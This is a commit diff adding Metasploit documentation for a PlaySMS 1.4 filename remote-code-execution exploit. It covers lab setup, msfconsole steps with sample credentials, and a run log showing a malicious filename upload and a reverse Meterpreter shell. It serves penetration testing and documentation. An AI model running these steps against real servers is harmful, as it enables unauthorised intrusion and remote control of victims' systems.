playsms_filename_exec.md

doc update
2018-04-28 19:41:32 +05:30 · 2018-04-28 19:41:32 +05:30 · d01a664a3f
parent ce099aea76
commit d01a664a3f
1 changed files with 64 additions and 0 deletions
--- a/documentation/modules/exploit/multi/http/playsms_filename_exec.md
+++ b/documentation/modules/exploit/multi/http/playsms_filename_exec.md
@ -0,0 +1,64 @@
+## Description
+this Module exploits a Authenticated File Upload and In filename parameter have Remote Code Excution Vulnerability in PlaySMS Version 1.4. This issue is caused by improper File name handling in sendfromfile.php file. Authenticated Users can upload a file and rename file name with a malicious payload. Additional information and vulnerabilities can be viewed on Exploit-DB [42044]( https://www.exploit-db.com/exploits/42003/))
+**NOTE :** This Module is already PULLED but for some reason closed by author Check [#9840](https://github.com/rapid7/metasploit-framework/pull/9840)
+
+## Vulnerable Application 
+Available at [Exploit-DB](https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz)
+
+## Vulnerable Application Installation Setup.
+Download Application : ```wget https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz```
+
+Extract : ```tar -xvf 577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz```
+
+Move In WebDirectory : ```mv playsms-1.4/web/* /var/www/html/```
+
+make config file: ```cp /var/www/html/config-dist.php /var/www/html/config.php```
+
+Change Owner : ```chown -R www-data:www-data /var/www/html/```
+
+Set DB creds in config.php File. And dump playsms-1.4/db/playsms.sql in your playsms database.
+
+Now Visit : http://localhost/
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: `use exploit/multi/http/playsms_filename_exec`
+  4. Do: `set rport <port>`
+  5. Do: `set rhost <ip>`
+  6. Do: `set targeturi SecreTSMSgatwayLogin`
+  7. Do: `set username touhid`
+  8. Do: `set password diana`
+  9. Do: `check`
+```
+[*] 10.22.1.10:80 The target appears to be vulnerable.
+```
+  10. Do: `set lport <port>`
+  11. Do: `set lhost <ip>`
+  12. Do: `exploit`
+  13. You should get a shell.
+
+## Options
+
+  **TARGETURI**
+
+  TARGETURI by default is `/`,  however it can be changed.
+
+## Scenarios
+### Playsms on Ubuntu Linux
+```
+msf exploit(multi/http/playsms_filename_exec) > run                                                                                    
+                                                                                                                                       
+[*] Started reverse TCP handler on 10.22.1.3:4444                                                                                      
+[+] X-CSRF-Token for login : 13bce9776cfc270a3779e8b557330cc2                                                                          
+[*] Trying to Login ......                                                                                                             
+[+] Authentication successful : [ touhid:diana ]                                                                                       
+[+] X-CSRF-Token for upload : 2780d48dc11a482a58d8a95ad873c6cc                                                                         
+[*] Trying to upload file with malicious Filename Field....                                                                            
+[*] Sending stage (37775 bytes) to 10.22.1.15                                                                                          
+[*] Sleeping before handling stage...                                                                                                  
+[*] Meterpreter session 1 opened (10.22.1.3:4444 -> 10.22.1.15:38814) at 2018-04-08 13:45:34 +0530                                     
+                                                                                                                                       
+meterpreter >
+```